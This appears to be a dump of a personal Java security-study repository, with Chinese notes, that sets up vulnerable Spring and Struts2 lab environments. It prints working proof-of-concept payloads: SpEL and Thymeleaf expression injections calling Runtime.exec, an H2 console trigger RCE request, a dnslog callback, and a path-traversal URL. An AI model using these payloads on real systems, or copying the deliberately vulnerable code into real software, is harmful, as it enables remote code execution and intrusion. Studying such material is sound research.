'1.8' 10 | 11 | repositories { 12 | mavenCentral() 13 | } 14 | 15 | dependencies { 16 | implementation 'org.springframework.boot:spring-boot-starter-data-jpa' 17 | implementation 'org.springframework.boot:spring-boot-starter-data-rest' 18 | runtimeOnly 'com.h2database:h2' 19 | testImplementation 'org.springframework.boot:spring-boot-starter-test' 20 | } 21 | 22 | test { 23 | useJUnitPlatform() 24 | } 25 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/Main.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/Main.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/SpELTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/SpELTest.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/AccessingDataRestApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/AccessingDataRestApplication.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/Person.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/Person.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/PersonRepository.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/PersonRepository.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/test/com/example/accessingdatarest/AccessingDataRestApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/test/com/example/accessingdatarest/AccessingDataRestApplicationTests.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/tmp/compileJava/source-classes-mapping.txt: -------------------------------------------------------------------------------- 1 | com/example/accessingdatarest/AccessingDataRestApplication.java 2 | com.example.accessingdatarest.AccessingDataRestApplication 3 | com/example/accessingdatarest/PersonRepository.java 4 | com.example.accessingdatarest.PersonRepository 5 | EZvulhub/Main.java 6 | EZvulhub.Main 7 | com/example/accessingdatarest/Person.java 8 | com.example.accessingdatarest.Person 9 | EZvulhub/SpELTest.java 10 | EZvulhub.SpELTest 11 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/tmp/compileTestJava/source-classes-mapping.txt: -------------------------------------------------------------------------------- 1 | com/example/accessingdatarest/AccessingDataRestApplicationTests.java 2 | com.example.accessingdatarest.AccessingDataRestApplicationTests 3 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/gradle/wrapper/gradle-wrapper.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-6.5.1-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/settings.gradle: -------------------------------------------------------------------------------- 1 | rootProject.name = 'accessing-data-rest' 2 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/EZvulhub/Main.java: -------------------------------------------------------------------------------- 1 | package EZvulhub; 2 | 3 | /** Helper that prints a command string as a Java byte-array literal. It only encodes and prints to stdout; nothing is executed. Presumably used to build the byte[] form that the CVE-2017-8046 SpEL payload in this lab expects — confirm against the analysis PDF on this page. */ public class Main { 4 | public static void main(String[] args) { 5 | String command = "calc"; 6 | generateCommond(command); 7 | } 8 | 9 | /** Prints {@code new byte[]{b0,b1,...}} for the bytes of {@code command}. getBytes() with no charset uses the JVM default charset, so the output for non-ASCII input depends on the host. NOTE(review): the first printed label carries a stray leading 'm' before 命令. */ private static void generateCommond(String command) { 10 | System.out.println("m命令: " + command); 11 | byte[] result = command.getBytes(); 12 | System.out.print("命令转为字节数组表示: "); 13 | System.out.print("new byte[]{"); 14 | /* comma after every byte except the last */ for (int i = 0; i < result.length; i++) { 15 | if (i != result.length - 1) { 16 | System.out.print(result[i] + ","); 17 | } else { 18 | System.out.print(result[i]); 19 | } 20 | } 21 | System.out.print("}\n"); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/EZvulhub/SpELTest.java: 
-------------------------------------------------------------------------------- 1 | //package EZvulhub; 2 | // 3 | //import org.springframework.expression.Expression; 4 | //import org.springframework.expression.ExpressionParser; 5 | //import org.springframework.expression.spel.standard.SpelExpressionParser; 6 | // 7 | //public class SpELTest { 8 | // public static void main(String[] args) { 9 | // String SpEL = "T(java.lang.Runtime).getRuntime().exec('calc')"; 10 | // // 11 | // testSpEL(SpEL); 12 | // } 13 | // private static void testSpEL(String spEL){ 14 | // ExpressionParser parser = new SpelExpressionParser(); 15 | // Expression exp = parser.parseExpression(spEL); 16 | // exp.getValue();//Value(); 17 | // } 18 | //} 19 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/EZvulhub/test.java: -------------------------------------------------------------------------------- 1 | package EZvulhub; 2 | 3 | public class test { 4 | public static void main(String[] args) { 5 | Runtime.getRuntime().exec("ping cw58lb.dnslog.cn"); 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/com/example/accessingdatarest/AccessingDataRestApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.accessingdatarest; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class AccessingDataRestApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(AccessingDataRestApplication.class, args); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/com/example/accessingdatarest/Person.java: 
-------------------------------------------------------------------------------- 1 | package com.example.accessingdatarest; 2 | 3 | import javax.persistence.Entity; 4 | import javax.persistence.GeneratedValue; 5 | import javax.persistence.GenerationType; 6 | import javax.persistence.Id; 7 | 8 | @Entity 9 | public class Person { 10 | 11 | @Id 12 | @GeneratedValue(strategy = GenerationType.AUTO) 13 | private long id; 14 | 15 | private String firstName; 16 | private String lastName; 17 | 18 | public String getFirstName() { 19 | return firstName; 20 | } 21 | 22 | public void setFirstName(String firstName) { 23 | this.firstName = firstName; 24 | } 25 | 26 | public String getLastName() { 27 | return lastName; 28 | } 29 | 30 | public void setLastName(String lastName) { 31 | this.lastName = lastName; 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/com/example/accessingdatarest/PersonRepository.java: -------------------------------------------------------------------------------- 1 | package com.example.accessingdatarest; 2 | 3 | import java.util.List; 4 | 5 | import org.springframework.data.repository.PagingAndSortingRepository; 6 | import org.springframework.data.repository.query.Param; 7 | import org.springframework.data.rest.core.annotation.RepositoryRestResource; 8 | 9 | @RepositoryRestResource(collectionResourceRel = "people", path = "people") 10 | public interface PersonRepository extends PagingAndSortingRepository { 11 | 12 | List findByLastName(@Param("name") String name); 13 | 14 | } 15 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-1270 2 | 3 | CVE-2018-1270 表达式RCE环境 4 | -------------------------------------------------------------------------------- 
/Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/Bean/Greeting.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo.Bean; 2 | 3 | /** 4 | * @ClassName Greeting 5 | * @Description TODO 6 | * @Author wangyu89 7 | * @Create Time 2018/12/13 22:40 8 | * @Version 1.0 9 | */ 10 | public class Greeting { 11 | private String content; 12 | 13 | public Greeting() { 14 | } 15 | 16 | public Greeting(String content) { 17 | this.content = content; 18 | } 19 | 20 | public String getContent() { 21 | return content; 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/Bean/HelloMessage.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo.Bean; 2 | 3 | /** 4 | * @ClassName HelloMessage 5 | * @Description TODO 6 | * @Author wangyu89 7 | * @Create Time 2018/12/13 22:40 8 | * @Version 1.0 9 | */ 10 | public class HelloMessage { 11 | private String name; 12 | 13 | public HelloMessage() { 14 | } 15 | 16 | public HelloMessage(String name) { 17 | this.name = name; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/Controller/GreetingController.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo.Controller; 2 | 3 | import com.venscor.demo.Bean.Greeting; 4 | import com.venscor.demo.Bean.HelloMessage; 5 | import org.springframework.messaging.handler.annotation.MessageMapping; 6 | import 
org.springframework.messaging.handler.annotation.SendTo; 7 | import org.springframework.stereotype.Controller; 8 | import org.springframework.web.util.HtmlUtils; 9 | 10 | /** 11 | * @ClassName GreetingController 12 | * @Description TODO 13 | * @Author wangyu89 14 | * @Create Time 2018/12/13 22:39 15 | * @Version 1.0 16 | */ 17 | @Controller 18 | public class GreetingController { 19 | @MessageMapping("/hello") 20 | @SendTo("/topic/greetings") 21 | public Greeting greeting(HelloMessage message) throws Exception { 22 | Thread.sleep(1000); // simulated delay 23 | return new Greeting("Hello, " + HtmlUtils.htmlEscape(message.getName()) + "!"); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/SpringmessagespelApplication.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class SpringmessagespelApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(SpringmessagespelApplication.class, args); 11 | } 12 | 13 | } 14 | 15 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/WebSocketConfig.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo; 2 | 3 | import org.springframework.context.annotation.Configuration; 4 | import org.springframework.messaging.simp.config.MessageBrokerRegistry; 5 | import org.springframework.web.socket.config.annotation.EnableWebSocketMessageBroker; 6 | import org.springframework.web.socket.config.annotation.StompEndpointRegistry; 7 | import 
org.springframework.web.socket.config.annotation.WebSocketMessageBrokerConfigurer; 8 | 9 | /** 10 | * @ClassName WebSocketConfig 11 | * @Description Lab configuration for the CVE-2018-1270 environment: registers a SockJS STOMP endpoint and enables the in-memory simple broker. The SpEL evaluation the CVE concerns lives in spring-messaging's broker/subscription handling, not in this class — confirm against the analysis PDF on this page. 12 | * @Author wangyu89 13 | * @Create Time 2018/12/13 22:31 14 | * @Version 1.0 15 | */ 16 | @Configuration 17 | @EnableWebSocketMessageBroker 18 | public class WebSocketConfig implements WebSocketMessageBrokerConfigurer { 19 | @Override 20 | public void registerStompEndpoints(StompEndpointRegistry registry) { 21 | /* Single SockJS endpoint. No allowed-origins list is set, so the Spring version's default origin policy applies — verify it for the version in use before exposing this beyond a lab. */ registry.addEndpoint("/gs-guide-websocket").withSockJS(); 22 | } 23 | 24 | @Override 25 | public void configureMessageBroker(MessageBrokerRegistry registry) { 26 | /* In-memory broker for /topic; GreetingController's @SendTo("/topic/greetings") publishes here. */ registry.enableSimpleBroker("/topic"); 27 | /* Client messages to /app/** are routed to @MessageMapping handlers, e.g. /app/hello. */ registry.setApplicationDestinationPrefixes("/app"); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/CVE-2018-1270.pdf -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/012A8071.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/012A8071.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/1.gif -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220152220717.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220152220717.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154332152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154332152.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154922801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154922801.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160150498.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160150498.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160459956.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160459956.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161508697.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161508697.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161825423.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161825423.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161931650.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161931650.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220162251047.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220162251047.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/未命名-副本.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/未命名-副本.gif -------------------------------------------------------------------------------- /Spring/Readme.md: -------------------------------------------------------------------------------- 1 | # Spring 2 | 3 | + [aop技术](./spring-aop底层.pdf) 4 | + [cve-2016-4977]() 5 | + [cve-2017-4971]() 6 | + [cve-2018-1270]() 7 | 
-------------------------------------------------------------------------------- /Spring/spring-aop底层.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/spring-aop底层.pdf -------------------------------------------------------------------------------- /Springboot/Readme.md: -------------------------------------------------------------------------------- 1 | # Springboot 漏洞 2 | 3 | 参考:https://github.com/LandGrey/SpringBootVulExploit 4 | 写的非常全. 5 | 6 | **该系列漏洞主要是通过env的配置接口进行配置,刷新或者重启触发漏洞** 7 | 8 | 补:0x07:h2 database console JNDI RCE 9 | 10 | 限制: 11 | 开启 -webAllowOthers 选项,支持外网访问 12 | 开启 -ifNotExists 选项,支持创建数据库 13 | 14 | 不需要出网利用: 15 | ``` 16 | language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=org.h2.Driver&url=jdbc%3ah2%3amem%3atest%3bMODE%3dMSSQLServer%3binit%3dCREATE+TRIGGER+shell3+BEFORE+SELECT+ON+INFORMATION_SCHEMA.TABLES+AS+$$//javascript%0a%0ajava.lang.Runtime.getRuntime().exec('cmd+/c+calc.exe')$$&user=sa&password= 17 | ``` 18 | -------------------------------------------------------------------------------- /Springcolud/Readme.md: -------------------------------------------------------------------------------- 1 | # Springcolud 2 | 3 | ## CVE-2021-22053 4 | 5 | >今天有幸看到了三梦师傅写的[CVE-2021-22053: Spring Cloud Netflix Dashboard template resolution vulnerability](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053) poc,在好自己最近在看spring-cloud这些微服务,然后就简单的看了看学习。 6 | 7 | 先简单的介绍一下**hystrix** 8 | 9 | ## Hystrix 10 | 11 | 容错监控机制 12 | 13 | 也就是微服务的容错机制是提前预设解决⽅案,系统进⾏⾃主调节,遇到问题及时处理 14 | 15 | ### Hystrix的优点 16 | 17 | ``` 18 | 服务隔离机制 19 | 服务降级机制 20 | 熔断机制 21 | 提供实时的监控和报警功能 22 | 提供实时的配置修改功能 23 | ``` 24 | 25 | 而hystrix-dashboard 就是可视化界⾯组件。 26 | 27 | 所以简单的说spring-cloud-starter-netflix-hystrix-dashboard 就是springcolud中的一个组件,是**Hystrix** 容错监控机制的可视化界⾯组件。 28 | 29 | 30 | 31 | ## 复现 32 | 33 
| 三梦师傅也说明了漏洞版本 34 | 35 | 漏洞版本:spring-cloud-starter-netflix-hystrix-dashboard **2.2.0.RELEASE to 2.2.9.RELEASE** 36 | 37 | 并且三梦师傅提供了漏洞环境,本地搭建起测试了一下,成功利用。 38 | 39 | ![image-20211123210133522](https://user-images.githubusercontent.com/63966847/146506766-df253d5b-d032-43cf-8019-d4af56376cca.png) 40 | 41 | 42 | ## 分析 43 | 44 | 还是经典的对比分析,对比漏洞版本和fix版本 45 | 46 | ![image-20211123210337765](https://user-images.githubusercontent.com/63966847/146506804-c8600043-5e0a-4d87-b3be-3230a1fd8587.png) 47 | 48 | 49 | 可以发现漏洞版本对{path}变量可以控制,熟悉**Thymeleaf**模板注入的师傅一眼就可以看出来了。 50 | 51 | 在该版本依赖的Thymeleaf组件版本是3.0.12。正好三梦师傅师傅之前写过文章bypass。前几天panda师傅也发了文章关于这部分进行介绍。 52 | 53 | ![image-20211123211222190](https://user-images.githubusercontent.com/63966847/146506787-871d831a-19bd-4571-a06b-19a65bdf080f.png) 54 | 55 | 56 | poc 57 | 58 | ```http 59 | http://127.0.0.1:8080/hystrix/;/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22calc%22)%7D__::.x/ 60 | ``` 61 | 62 | -------------------------------------------------------------------------------- /Struts2/README.md: -------------------------------------------------------------------------------- 1 | # Struts02漏洞学习 2 | 3 | >前段时间就开始学习java安全了,之前分析过spring框架的spel表达式注入,都是使用构造好的环境。所有在环境搭建方面没有花费很多时间,于是就开始了Struts框架漏洞学习。 4 | 5 | **Struts框架**可以说是漏洞最多的框架,而基本上是使用`OGNL表达式注入`其实就有点和`EL`表达式,都是为了方便写代码。。。可能我是这么理解的。 6 | 7 | [OGNL表达式介绍](https://www.cnblogs.com/renchunxiao/p/3423299.html) 8 | 9 | 还有说明一下,这里的环境都是自己搭建的,使用花费了我好多时间。。。(因为`struts.xml`配置文件前面多了一个空格导致环境出问题。。还是自己tcl)这里推荐去了解一下Struts02框架。简简单单的学习一下就OK。 10 | 11 | [Struts2框架基础](https://www.cnblogs.com/cenyu/p/6219894.html)可以看文章也可以看视频,我比较笨就看的视频加看文章。[2020最新Struts2框架教程——SSH系列](https://www.bilibili.com/video/BV1tp4y1v7gc) 12 | 13 | **接下来就开始我们的Struts02漏洞学习** 14 | 之前看了一个文章比较好,可以说是Struts2漏洞的原理吧。。。 15 | [Struts2漏洞利用原理及OGNL机制研究](https://xz.aliyun.com/t/225#toc-0) 16 | 17 | ## 下面是搭建搭建 18 | 漏洞版本去官网下载就可以 19 | [漏洞版本](http://archive.apache.org/dist/struts/binaries/) 20 | ![](./img/环境.png) 21 | 22 | 
-------------------------------------------------------------------------------- /Struts2/Struts2-001/Struts001.java: -------------------------------------------------------------------------------- 1 | package com.vulhub.struts; 2 | 3 | import com.opensymphony.xwork2.ActionSupport; 4 | 5 | /** Demo login action for the S2-001 lab (struts2-core 2.0.8 per the pom on this page). Request parameters reach the fields through the setters below; the advisory linked from index.jsp describes how a re-rendered field value containing an OGNL %{...} expression gets evaluated in affected versions. Lab-only code: hard-coded plaintext credentials, no input validation. */ public class Struts001 extends ActionSupport { 6 | private String username; 7 | private String password; 8 | 9 | 10 | @Override 11 | /** Returns "success" only for admin/admin, "error" otherwise. Both fields are dereferenced without a null check, so a request that omits either parameter throws a NullPointerException here rather than returning "error". */ public String execute() throws Exception { 12 | if ((this.username.isEmpty()) || (this.password.isEmpty())) { 13 | return "error"; 14 | } 15 | if ((this.username.equalsIgnoreCase("admin")) 16 | && (this.password.equals("admin")) 17 | ) { 18 | return "success"; 19 | } 20 | return "error"; 21 | 22 | } 23 | /** NOTE: deliberately discards the submitted value and pins the field to an OGNL expression so the re-rendered form demonstrates the S2-001 double evaluation; a real action would assign the parameter. With this setter in place the login can never succeed. */ public void setPassword(String password) { 24 | this.password = "%{1+1}"; 25 | } 26 | 27 | public String getPassword() { 28 | return password; 29 | } 30 | 31 | public String getUsername() { 32 | return username; 33 | } 34 | 35 | public void setUsername(String username) { 36 | this.username = username; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/Struts02-001简单分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-001/Struts02-001简单分析.pdf -------------------------------------------------------------------------------- /Struts2/Struts2-001/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" contentType="text/html; charset=UTF-8" 2 | pageEncoding="UTF-8"%> 3 | <%@ taglib prefix="s" uri="/struts-tags" %> 4 | 5 | 6 | 7 | 8 | S2-001 9 | 10 | 11 |

S2-001 Demo

12 |

link: https://cwiki.apache.org/confluence/display/WW/S2-001

13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | org.vulhub.web 8 | struts01 9 | 1.0-SNAPSHOT 10 | war 11 | 12 | struts01 Maven Webapp 13 | 14 | http://www.example.com 15 | 16 | 17 | UTF-8 18 | 1.7 19 | 1.7 20 | 21 | 22 | 23 | 24 | junit 25 | junit 26 | 4.11 27 | test 28 | 29 | 30 | 31 | org.apache.struts 32 | struts2-core 33 | 2.0.8 34 | 35 | 36 | 37 | org.apache.logging.log4j 38 | log4j-core 39 | 2.10.0 40 | 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 21 | /show.jsp 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | /welcome.jsp 31 | /struts001.jsp 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | struts2 8 | 9 | org.apache.struts2.dispatcher.FilterDispatcher 10 | 11 | 12 | 13 | struts2 14 | 15 | /* 16 | 17 | Archetype Created Web Application 18 | 19 | 20 | -------------------------------------------------------------------------------- /Struts2/Struts2-002/Struts02-002简单分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-002/Struts02-002简单分析.pdf -------------------------------------------------------------------------------- /Struts2/Struts2-002/index.jsp: -------------------------------------------------------------------------------- 1 | 4 | 5 | <%@taglib prefix="s" uri="/struts-tags" 
%> 6 | 7 | 8 | 9 | 10 | ">你好Struts2 11 | 12 | 13 | -------------------------------------------------------------------------------- /Struts2/Struts2-004/README.md: -------------------------------------------------------------------------------- 1 | # Struts2-004 2 | 3 | ## 漏洞概要 4 | 5 | Struts2-004是一个目录遍历漏洞。 6 | 7 | 影响版本: **Struts 2.0.0 - 2.0.11.2、Struts 2.1.0 - 2.1.2** 。 8 | 9 | 官方通告:https://cwiki.apache.org/confluence/display/WW/S2-004 10 | 11 | ## 漏洞原理 12 | 13 | 本次漏洞,主要问题出现在 **FilterDispatcher** 类对静态资源文件的处理。当请求资源文件路径以 **/struts** 开头时,就会调用 **findStaticResource** 方法寻找资源。 14 | 15 | ```java 16 | if (serveStatic && resourcePath.startsWith("/struts")) { 17 | String name = resourcePath.substring("/struts".length()); 18 | this.findStaticResource(name, request, response); 19 | } else { 20 | chain.doFilter(request, response); 21 | } 22 | ``` 23 | 24 | 跟进 **findStaticResource** 方法,我们发现如果文件后缀不为 **.class** ,则调用 **findInputStream** 来读取文件内容,而且文件路径会进行一次 **URLdecode** ,但是这里没有对文件名进行任何过滤,这也导致了路径穿越问题。 25 | 26 | ```java 27 | if (!name.endsWith(".class")) { 28 | String[] arr$ = this.pathPrefixes; 29 | int len$ = arr$.length; 30 | 31 | for(int i$ = 0; i$ < len$; ++i$) { 32 | String pathPrefix = arr$[i$]; 33 | InputStream is = this.findInputStream(name, pathPrefix);//读文件 34 | ... 
35 | } 36 | ``` 37 | 38 | poc:`http://localhost:8081/struts/..%2f..%2f` 39 | 40 | ## 漏洞修复 41 | 42 | 修复代码,使用 **URL.getFile()** 获取文件的真实路径,然后在用 **endWith** 来判断后缀,二者结合可以有效解决路径穿越问题。 43 | 44 | ## 参考 45 | 46 | >https://mochazz.github.io/2020/06/28/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BStruts2-004/ 47 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/Struts007.java: -------------------------------------------------------------------------------- 1 | package com.vulhub.struts; 2 | 3 | import com.opensymphony.xwork2.ActionSupport; 4 | 5 | public class Struts007 extends ActionSupport { 6 | private Integer age = null; 7 | private String name = null; 8 | private String email = null; 9 | 10 | public Struts007() { 11 | } 12 | 13 | public void setAge(Integer age) { 14 | this.age = age; 15 | } 16 | 17 | public Integer getAge() { 18 | return this.age; 19 | } 20 | 21 | public void setName(String name) { 22 | this.name = name; 23 | } 24 | 25 | public String getName() { 26 | return this.name; 27 | } 28 | 29 | public void setEmail(String email) { 30 | this.email = email; 31 | } 32 | 33 | public String getEmail() { 34 | return this.email; 35 | } 36 | 37 | public String execute() throws Exception { 38 | return !this.name.isEmpty() && !this.email.isEmpty() ? 
